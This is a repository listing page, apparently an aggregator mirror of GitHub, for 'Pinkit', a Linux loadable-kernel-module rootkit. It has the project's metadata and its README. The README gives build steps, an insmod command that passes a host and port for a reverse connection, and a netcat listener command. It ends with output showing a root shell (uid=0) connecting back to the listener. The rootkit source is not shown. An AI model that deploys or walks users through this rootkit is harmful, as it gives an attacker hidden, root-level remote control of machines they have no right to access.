https://github.com/pinkp4nther/pinkit

A quick LKM rootkit that executes a reverse TCP netcat shell with root privileges.
https://github.com/pinkp4nther/pinkit

c linux linux-kernel linux-kernel-module lkm lkm-rootkit netcat netcat-reverse reverse-shell

Last synced: 3 months ago
JSON representation

A quick LKM rootkit that executes a reverse TCP netcat shell with root privileges.

• Host: GitHub
• URL: https://github.com/pinkp4nther/pinkit
• Owner: PinkP4nther
• Created: 2018-05-15T05:02:02.000Z (over 6 years ago)
• Default Branch: master
• Last Pushed: 2018-06-08T10:07:28.000Z (over 6 years ago)
• Last Synced: 2024-08-02T02:12:08.400Z (3 months ago)
• Topics: c, linux, linux-kernel, linux-kernel-module, lkm, lkm-rootkit, netcat, netcat-reverse, reverse-shell
• Language: C
• Homepage:
• Size: 12.7 KB
• Stars: 41
• Watchers: 2
• Forks: 18
• Open Issues: 0
• Metadata Files:
  • Readme: README.TXT

Awesome Lists containing this project

• awesome-network-stuff - **20**星

README

        
# Pinkit

A quick LKM rootkit that executes a reverse netcat shell with root privileges.

INSTALL

[Dependencies]

apt install build-essential linux-headers-$(uname -r)

[Compile Kernel Module]

cd Pinkit; make

[Execute Reverse Shell]

# nc must be installed

nc -lvp 1339 <- Run netcat listener in another shell

[Insert and remove LKM]

[root@Dev Pinkit]# insmod pinkit.ko host="REV_TCP_LH=127.0.0.1" port="REV_TCP_LP=1339"

[root@Dev Pinkit]# cat /proc/modules |grep pink

pinkit 16384 0 - Live 0xffffffffc0aa6000 (PO)

[root@Dev Pinkit]# rmmod pinkit

[Once LKM is loaded shell will connect to nc listener]

[ra_horakhty][Dev][Pinkit]

-> ncat -lvp 1339

Ncat: Version 7.70 ( https://nmap.org/ncat )

Ncat: Listening on :::1339

Ncat: Listening on 0.0.0.0:1339

Ncat: Connection from 127.0.0.1.

Ncat: Connection from 127.0.0.1:41060.

sh: cannot set terminal process group (-1): Inappropriate ioctl for device

sh: no job control in this shell

sh-4.4# id

id

uid=0(root) gid=0(root) groups=0(root)